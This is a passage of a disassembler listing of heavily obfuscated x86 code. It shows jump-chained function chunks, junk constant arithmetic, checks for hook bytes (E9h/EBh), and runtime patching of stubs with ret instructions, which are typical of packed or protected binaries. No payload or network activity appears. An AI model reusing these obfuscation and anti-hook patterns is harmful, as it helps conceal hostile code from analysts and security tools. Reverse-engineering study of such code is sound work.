; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_44FA62:				; CODE XREF: sub_44CB64:loc_4463A5j
		or	eax, 0A5AAEEB4h
		add	eax, 5A549C3Bh
		xchg	eax, [esp+0]
		jmp	loc_439233
; END OF FUNCTION CHUNK	FOR sub_44CB64

; =============== S U B	R O U T	I N E =======================================



sub_44FA76	proc near		; DATA XREF: sub_4442B9:loc_4521ADo

; FUNCTION CHUNK AT 0043BA85 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044D04F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045281D SIZE 0000000A BYTES

		call	dword ptr [ebp-4]
		jmp	loc_44D04F
sub_44FA76	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_44FA7E:				; CODE XREF: sub_43B3BE:loc_44C4F0j
		push	0BDEBD79Eh
		pop	eax
		and	eax, 0D08C7F9Dh
		rol	eax, 0Bh
		add	eax, 0F3C964AAh
		or	eax, 4E02424h

loc_44FA99:				; CODE XREF: sub_43B3BE:loc_444BFFj
		jmp	loc_43F75B
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_44FA9E:				; CODE XREF: sub_442F6B:loc_4432EBj
		jns	loc_43DF3D
		cmp	ebx, edx
		jmp	loc_43C2C6
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44FAAB:				; CODE XREF: sub_45889B-3ED4j
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_44FAAF:				; CODE XREF: hvvrg7ie:00456AC4j
		jmp	sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_44FAB4:				; CODE XREF: sub_447E56+2CC8j
		jmp	loc_454604
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_44FAB9:				; CODE XREF: sub_449CC8+Aj
		jmp	loc_44F8A2
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44FABE:				; CODE XREF: sub_444BE1+12j
		jmp	loc_444F36
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44FAC3:				; CODE XREF: sub_45889B-CB78j
		mov	eax, [ebp-4]
		mov	eax, [eax]
		add	[ebp-28h], eax
		mov	eax, [ebp-28h]
		jmp	loc_43D3F1
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44FAD3:				; CODE XREF: sub_45541B-111E0j
		jb	sub_45A1CA
		adc	esi, 13456B53h
		or	ebx, 44AE744Eh
		add	ebx, esi
		jmp	loc_458E17
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_44FAEC:				; CODE XREF: sub_443048:loc_440A00j
					; sub_443048-263Ej
		call	sub_4420E2
; END OF FUNCTION CHUNK	FOR sub_443048
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44FAF1:				; CODE XREF: sub_43A839+374Fj
		push	4
		call	sub_439AE3

loc_44FAF8:				; CODE XREF: sub_44AAC1+4j
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		push	ebx
		jmp	loc_446BE1
; END OF FUNCTION CHUNK	FOR sub_43A839

; =============== S U B	R O U T	I N E =======================================



sub_44FB04	proc near		; DATA XREF: sub_44AC6E+6o
		push	eax
		push	0
		call	sub_44BF29
		pop	eax
		cmp	dword ptr [eax], 0
		jnz	loc_43FDD3
		jmp	sub_45A98D
sub_44FB04	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC6E

loc_44FB1B:				; CODE XREF: sub_44AC6Ej
		push	eax
		push	0
		jmp	loc_45AB69
; END OF FUNCTION CHUNK	FOR sub_44AC6E

; =============== S U B	R O U T	I N E =======================================



sub_44FB23	proc near		; DATA XREF: sub_45B07D-B734o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E9h
sub_44FB23	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_44FB29:				; CODE XREF: sub_43B9C9:loc_43B9D8j
		jz	loc_45A25B
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0EBh
		jz	loc_45A25B
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_44CB70
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
		or	ebp, esi
		jmp	sub_44081B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_44FB4C:				; CODE XREF: sub_4557D4-191E4j
		push	ecx
		push	61DE9FD6h
		pop	ecx
		and	ecx, 16881961h
		add	ecx, 8824A464h
		and	ecx, 6BE916AEh
		rol	ecx, 0Eh
		jmp	loc_43B90F
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_44FB6D:				; CODE XREF: sub_44980B-939Fj
					; sub_4512A0:loc_454FEBj
		add	ebp, eax
		test	eax, esi
		jmp	loc_43C08F
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4D7

loc_44FB76:				; CODE XREF: sub_43C4D7+1E5CCj
		xchg	ecx, [esp+8+var_8]
		jmp	sub_45A98D
; END OF FUNCTION CHUNK	FOR sub_43C4D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_44FB7E:				; CODE XREF: sub_453BA4:loc_44E8C1j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+8+var_8]
		push	edi
		mov	edi, ebx
		xchg	edi, [esp+0Ch+var_C]
		mov	ebx, eax

loc_44FB8C:				; CODE XREF: hvvrg7ie:loc_450D5Fj
		jmp	loc_445C54
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
		add	edx, 978A0CA0h
		jmp	sub_4484B9
; ---------------------------------------------------------------------------

loc_44FB9C:				; DATA XREF: sub_4563DC-1745Ao
		add	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_456E04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44FBA6:				; CODE XREF: sub_440402+F4D4j
		adc	edx, [esp+8+var_4]
		push	offset sub_439498
		jmp	loc_44B381
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44FBB4:				; CODE XREF: sub_440643+31BAj
		cmp	ecx, 0C200BE49h
		jmp	loc_44F98F
; END OF FUNCTION CHUNK	FOR sub_440643
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_421. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44FBC0:				; CODE XREF: sub_43E128-310Ej
		jmp	loc_45A335
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_44FBC5:				; CODE XREF: hvvrg7ie:loc_455028j
					; sub_449425:loc_45829Aj
		jz	loc_43C7B3
		jmp	loc_442C06
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		sbb	ecx, eax
		shr	edi, 1Bh

loc_44FBD5:				; CODE XREF: hvvrg7ie:loc_450F55j
		sub	edi, 7831D5F0h
		test	edi, 1000h
		jmp	loc_44665D
; ---------------------------------------------------------------------------
		adc	edx, 0FA81C72h
		jmp	sub_446297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_44FBF1:				; CODE XREF: sub_44D47A:loc_442C9Aj
		jz	loc_452A98
		jmp	loc_440FB3
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_44FBFC:				; CODE XREF: sub_45AAC8-D014j
		push	2969209Fh
		add	esi, 7D00D27Ah
		or	ebx, 9ED1958h
		jmp	loc_45643B
; END OF FUNCTION CHUNK	FOR sub_45AAC8

; =============== S U B	R O U T	I N E =======================================



sub_44FC12	proc near		; CODE XREF: hvvrg7ie:loc_449325p
					; sub_451E6D:loc_45A764j

; FUNCTION CHUNK AT 004478C6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004483EE SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	edi, 9146A983h
		popf
		and	ecx, edi
		pop	edi
		mov	eax, 1
		jmp	loc_4478C6
sub_44FC12	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44FC2A:				; DATA XREF: sub_44616F:loc_44623Bo
		mov	edx, [edx]
		mov	[edx], al
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-24h]
		cmp	byte ptr [eax],	2Eh
		jnz	loc_44146F
		jmp	loc_445947
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44FC42:				; CODE XREF: sub_450434-14A9Bj
					; sub_44D2F8:loc_45132Bj
		jnz	loc_43A578
		jmp	loc_43C921
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4422A8

loc_44FC4D:				; CODE XREF: sub_4422A8:loc_4422BBj
		mov	edi, edx

loc_44FC4F:				; CODE XREF: sub_443BCD:loc_44AD2Ej
		xchg	edi, [esp+0]
		push	offset loc_4524B5
		jmp	loc_452A74
; END OF FUNCTION CHUNK	FOR sub_4422A8

; =============== S U B	R O U T	I N E =======================================



sub_44FC5C	proc near		; DATA XREF: hvvrg7ie:00457AC9o

var_4		= dword	ptr -4

		push	eax
		push	2EF35384h
		pop	eax
		rol	eax, 12h
		add	eax, 0B233DC70h
		xchg	eax, [esp+4+var_4]
		jmp	sub_446A16
sub_44FC5C	endp

; ---------------------------------------------------------------------------

loc_44FC74:				; CODE XREF: hvvrg7ie:00439365j
		pop	ecx

loc_44FC75:				; CODE XREF: hvvrg7ie:loc_439358j
		xor	eax, 168BC4B1h
		add	eax, 0B702EF97h
		add	edx, eax
		pop	eax
		sbb	eax, ecx
		pop	ecx
		jmp	loc_443E1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_44FC8C:				; CODE XREF: sub_445934:loc_43BE08j
		shl	eax, 0Fh
		call	sub_44F39A

loc_44FC94:				; CODE XREF: hvvrg7ie:0043BB1Bj
		jmp	loc_446D27
; END OF FUNCTION CHUNK	FOR sub_445934
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_364. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44FC9A:				; CODE XREF: hvvrg7ie:004573DCj
		jmp	loc_43FC53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_44FC9F:				; CODE XREF: sub_458095-B083j
		jmp	sub_446B4C
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569F5

loc_44FCA4:				; CODE XREF: sub_4569F5-9FBEj
		jmp	loc_43EE67
; END OF FUNCTION CHUNK	FOR sub_4569F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456AC9

loc_44FCA9:				; CODE XREF: sub_456AC9+13j
		xchg	eax, [esp+4+var_4]
		jmp	loc_440C88
; END OF FUNCTION CHUNK	FOR sub_456AC9
; ---------------------------------------------------------------------------
		call	sub_43FA03
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_44FCB6:				; CODE XREF: sub_4414F6:loc_4414F7j
					; hvvrg7ie:0044FCEFj
		jmp	loc_4461E2
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_44FCBB:				; CODE XREF: sub_439549:loc_439181j
		and	eax, edx
		push	0ECF33EE2h
		adc	edi, 6A6D506Fh
		jmp	loc_4590F0
; END OF FUNCTION CHUNK	FOR sub_439549

; =============== S U B	R O U T	I N E =======================================



sub_44FCCD	proc near		; DATA XREF: hvvrg7ie:loc_43BF42o
		call	nullsub_505
		retn
sub_44FCCD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44FCD3:				; CODE XREF: sub_43E60A+1121Ej
		jmp	loc_452C53
; END OF FUNCTION CHUNK	FOR sub_43E60A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_505. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A91A

loc_44FCD9:				; CODE XREF: sub_44A91A+5D58j
		jmp	nullsub_517
; END OF FUNCTION CHUNK	FOR sub_44A91A
; ---------------------------------------------------------------------------

locret_44FCDE:				; CODE XREF: hvvrg7ie:0043E564j
					; hvvrg7ie:0044BFDEj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448181

loc_44FCDF:				; CODE XREF: sub_448181+16j
		jmp	loc_45215B
; END OF FUNCTION CHUNK	FOR sub_448181
; ---------------------------------------------------------------------------

loc_44FCE4:				; CODE XREF: hvvrg7ie:00443AD2j
		jmp	loc_4390B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44FCE9:				; CODE XREF: sub_43E063+3037j
		jmp	loc_44409B
; END OF FUNCTION CHUNK	FOR sub_43E063
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jz	short loc_44FCB6
		pop	esi
		sub	[eax-7Fh], ebx
		enter	0FFFF990Dh, 7Dh
		mov	es, word ptr [ecx+7FDC4CF0h]
		scasd
		jmp	loc_44E37A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_44FD05:				; CODE XREF: sub_445934-26ECj
		jz	loc_45ABC5
		jmp	loc_441BEB
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_44FD10:				; CODE XREF: sub_448100-C5C5j
		jl	loc_452A3F

loc_44FD16:				; CODE XREF: hvvrg7ie:0044F853j
		jmp	loc_44E838
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		test	ebp, 7395D898h
		jmp	loc_449169
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44FD26:				; CODE XREF: sub_43F227+17DB5j
		jbe	loc_4521CF
		xor	ebx, edi
		sbb	eax, 64FD6AAh
		shr	ebp, 1Dh
		jmp	loc_43F329
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_44FD3C:				; CODE XREF: sub_452B83:loc_4426AFj
		lea	eax, sub_449425
		call	sub_444BB4

loc_44FD47:				; CODE XREF: sub_43E128+1BCFBj
		jmp	loc_44D816
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------

loc_44FD4C:				; CODE XREF: hvvrg7ie:00457071j
		jmp	loc_44EB5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_44FD51:				; CODE XREF: sub_455B9C-67CDj
		jmp	loc_4411B5
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44FD56:				; CODE XREF: sub_43B6A5:loc_44343Aj
		push	5C73748Eh
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		pop	eax
		jmp	loc_459F02
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------

loc_44FD66:				; CODE XREF: hvvrg7ie:loc_44099Ej
		xor	edx, 0EC275A21h
		add	edx, 0ACFCDA42h
		mov	edx, [edx]
		push	offset sub_455B7D
		jmp	loc_449623
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F447

loc_44FD7E:				; CODE XREF: sub_43F447:loc_450F41j
		mov	ds:dword_41D134, eax
		lea	eax, nullsub_483
		mov	byte ptr [eax],	0C3h
		jmp	loc_44CC8F
; END OF FUNCTION CHUNK	FOR sub_43F447
; ---------------------------------------------------------------------------
		call	nullsub_24
		jmp	ds:dword_41D138
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D28

loc_44FD9D:				; CODE XREF: sub_458D28+9j
		jmp	loc_45689A
; END OF FUNCTION CHUNK	FOR sub_458D28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44FDA2:				; CODE XREF: sub_442FD1+85BFj
		jmp	loc_44A865
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
		jmp	loc_44545B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_44FDAC:				; CODE XREF: sub_43F8AB+C4B8j
		mov	[edx], eax
		xchg	edi, [ebp+0]

loc_44FDB1:				; CODE XREF: sub_43F8AB:loc_453A47j
		push	edi
		push	59E746D9h
		pop	edi
		sub	edi, ds:4000F8h
		jmp	loc_4547CE
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_44FDC3:				; CODE XREF: sub_44C6BE:loc_444CFEj
		call	sub_4584F2
		lea	eax, [ebp-0Ch]
		jmp	loc_45B5A5
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44FDD0:				; CODE XREF: sub_450F97:loc_4434FEj
		lea	eax, [ebp+var_20]
		mov	dword ptr [eax], 70736957h
		push	0EA32B775h
		pop	eax

loc_44FDDF:				; CODE XREF: sub_439B29:loc_4434A7j
		jmp	loc_45B12C
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC1E

loc_44FDE4:				; CODE XREF: sub_44CC1E:loc_44A586j
		push	offset sub_43BFCF
		jmp	nullsub_119
; END OF FUNCTION CHUNK	FOR sub_44CC1E
; ---------------------------------------------------------------------------
		test	edx, 0DFE231C9h
		jmp	loc_4402ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_44FDF9:				; CODE XREF: sub_44A230:loc_45152Ej
					; hvvrg7ie:00451549j
		or	eax, 0DF25C36Bh
		add	eax, 0C14643E4h
		xor	eax, 9513F6F4h
		add	eax, ebp
		push	ebx
		push	27E59BF5h
		jmp	loc_43C172
; END OF FUNCTION CHUNK	FOR sub_44A230
; ---------------------------------------------------------------------------
		popf
		jmp	sub_441230
; ---------------------------------------------------------------------------

loc_44FE1E:				; DATA XREF: hvvrg7ie:00458E0Do
		mov	byte ptr [eax],	0C3h
		jmp	loc_4467A8
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		call	sub_44081B
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44FE2F:				; CODE XREF: sub_454099+14j
		jmp	loc_447317
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44612F

loc_44FE34:				; CODE XREF: sub_44612F+7F3Cj
		popf
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44612F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44FE3C:				; CODE XREF: sub_44E3B3-1D63j
		jmp	loc_448EEE
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

loc_44FE41:				; CODE XREF: hvvrg7ie:0043C60Aj
		jmp	loc_444669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44FE46:				; CODE XREF: sub_44C2EA+EDBBj
		rol	eax, 4
		jmp	loc_4399DB
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------

loc_44FE4E:				; CODE XREF: hvvrg7ie:004598CAj
		jnz	loc_44F3FB
		jmp	loc_449848
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_44FE59:				; CODE XREF: sub_43BFCF:loc_43CD9Cj
		add	esi, 0E9229E7Ch
		xchg	esi, [esp+4+var_4]
		jmp	sub_43B248
; END OF FUNCTION CHUNK	FOR sub_43BFCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4470A9

loc_44FE67:				; CODE XREF: sub_4470A9:loc_457736j
		rol	edx, 5
		push	offset sub_453422
		jmp	loc_44ED9D
; END OF FUNCTION CHUNK	FOR sub_4470A9
; ---------------------------------------------------------------------------

loc_44FE74:				; CODE XREF: hvvrg7ie:0043FF2Cj
		cmp	eax, 0F7228AFEh
		jmp	loc_457E06
; ---------------------------------------------------------------------------

loc_44FE7F:				; CODE XREF: hvvrg7ie:004521E9j
		or	ebx, edx
; START	OF FUNCTION CHUNK FOR sub_4521D4

loc_44FE81:				; CODE XREF: sub_4521D4+9j
		or	edx, 37CA86CAh
		push	offset sub_4575D9
		jmp	loc_44A252
; END OF FUNCTION CHUNK	FOR sub_4521D4
; ---------------------------------------------------------------------------

loc_44FE91:				; CODE XREF: hvvrg7ie:0044C02Cj
		js	loc_44E4C9
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44FE97:				; CODE XREF: sub_43C0DE:loc_44CDD0j
		xor	edi, 0DC09F56Eh
		cmp	edi, 9FC33DF3h
		jmp	loc_43D280
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440603

loc_44FEA8:				; CODE XREF: sub_440603:loc_454A4Fj
		pop	ebp
		or	eax, 77F3103Fh
		xor	eax, 0D7C11AAEh
		call	sub_458A13
		push	esi
		push	9A66F3E8h
		pop	esi
		add	esi, 83165F6Fh
		jmp	loc_44670E
; END OF FUNCTION CHUNK	FOR sub_440603
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS	KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_377. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_44FECE:				; CODE XREF: sub_4591C3+16j
		jmp	loc_4455D8
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_44FED3:				; CODE XREF: sub_451D60-2A77j
		jmp	nullsub_147
; END OF FUNCTION CHUNK	FOR sub_451D60

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44FED8	proc near		; DATA XREF: sub_45717D:loc_45866Fo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004507F2 SIZE 00000018 BYTES

		mov	ebp, esp
		call	sub_43DB4C

loc_44FEDF:				; CODE XREF: sub_45AAC8-E36Bj
		jmp	loc_4507F2
sub_44FED8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449885

loc_44FEE4:				; CODE XREF: sub_449885+12j
		test	ebx, 200h
		jmp	loc_4451ED
; END OF FUNCTION CHUNK	FOR sub_449885
; ---------------------------------------------------------------------------

locret_44FEEF:				; CODE XREF: hvvrg7ie:loc_4525DFj
		retn
; ---------------------------------------------------------------------------

loc_44FEF0:				; DATA XREF: hvvrg7ie:00450031o
		or	eax, eax
		jnz	loc_43D98A
		jmp	loc_43D644
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_44FEFD:				; CODE XREF: sub_453422:loc_447DDFj
		ja	loc_4449C4
		jmp	loc_43DC55
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_44FF08:				; CODE XREF: sub_44736C:loc_4420FAj
		test	esi, 0FCE38A7Ah
		jmp	loc_44933E
; END OF FUNCTION CHUNK	FOR sub_44736C

; =============== S U B	R O U T	I N E =======================================



sub_44FF13	proc near		; DATA XREF: sub_44A91A+5D53o

arg_C		= dword	ptr  10h

		mov	ecx, [esp+arg_C]
		mov	dword ptr [ecx], 10001h
		push	offset sub_43AE24
		jmp	nullsub_516
sub_44FF13	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44FF28:				; CODE XREF: sub_43F227+102FBj
		jmp	nullsub_11
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_44FF2D:				; CODE XREF: hvvrg7ie:004567F7j
		jnz	loc_4548B2
		jmp	loc_443A9A
; ---------------------------------------------------------------------------
		push	0D51C98h
		jmp	sub_43FC7F
; ---------------------------------------------------------------------------

loc_44FF42:				; CODE XREF: hvvrg7ie:0043FACCj
		jns	loc_43D150
		cmp	ebx, ecx
		jmp	loc_43BD68
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_44FF4F:				; CODE XREF: sub_44B69F:loc_44B6A5j
		add	ecx, 0D8EC08FAh
		jmp	loc_450D3F
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44FF5A:				; CODE XREF: sub_44D2F8+403Fj
		ja	loc_44F6BE
		or	esi, 8B1A7C9h
		jnb	loc_449E63
		jmp	loc_44D6A6
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C562

loc_44FF71:				; CODE XREF: sub_43C562:loc_43EC3Ej
		pop	ecx
		lea	eax, sub_4475EC
		push	offset sub_4518EF
		jmp	loc_43F2E8
; END OF FUNCTION CHUNK	FOR sub_43C562
; ---------------------------------------------------------------------------
		sbb	ecx, edi
		jmp	sub_440ACD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45423F

loc_44FF89:				; CODE XREF: sub_45423F:loc_459C30j
		or	edx, 7CD9DA83h
		jnz	loc_447473
; END OF FUNCTION CHUNK	FOR sub_45423F
; START	OF FUNCTION CHUNK FOR sub_440603

loc_44FF95:				; CODE XREF: sub_440603+10D65j
		jmp	sub_43F272
; END OF FUNCTION CHUNK	FOR sub_440603
; ---------------------------------------------------------------------------
		test	esi, ecx
		jmp	loc_453E98
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454669

loc_44FFA1:				; CODE XREF: sub_454669+10j
		push	offset sub_4426F3
		jmp	loc_43E5C2
; END OF FUNCTION CHUNK	FOR sub_454669
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_44FFAC:				; CODE XREF: sub_4557D4-1B146j
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_44FFB1:				; CODE XREF: sub_4426E2:loc_440D4Ej
		pop	edi
		rol	edi, 0Dh
		or	edi, 1C27448Dh
		test	edi, 400h
		jmp	loc_4424F6
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_44FFC6:				; CODE XREF: sub_43B547:loc_4394F6j
		pop	esi
		add	esi, 0B3AE8303h
		test	esi, 2000000h
		jmp	loc_450B06
; END OF FUNCTION CHUNK	FOR sub_43B547

; =============== S U B	R O U T	I N E =======================================



sub_44FFD8	proc near		; CODE XREF: sub_4403B6-247Ep
					; hvvrg7ie:loc_45A7E3j

; FUNCTION CHUNK AT 0043BDEB SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xor	esi, 0DEA9B5A7h
		add	eax, esi
		pop	esi
		mov	ds:dword_448868, eax

loc_44FFEB:				; CODE XREF: hvvrg7ie:0044C838j
		jmp	loc_43BDEB
sub_44FFD8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44FFF0:				; CODE XREF: hvvrg7ie:0043D7ABj
		or	ebx, 0BDEC8EDAh
		ror	ebp, 11h
		jmp	sub_4449AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_44FFFE:				; CODE XREF: sub_44107D+1A0D7j
		cmp	ds:dword_45A8A0, 0
		jnz	loc_44A0BF
		call	sub_4572D1
		mov	edx, 0E5254649h
		jmp	loc_44E3DB
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------

loc_45001A:				; DATA XREF: sub_458FE7o
		jz	loc_44377D
		push	0C347E655h
		pop	eax
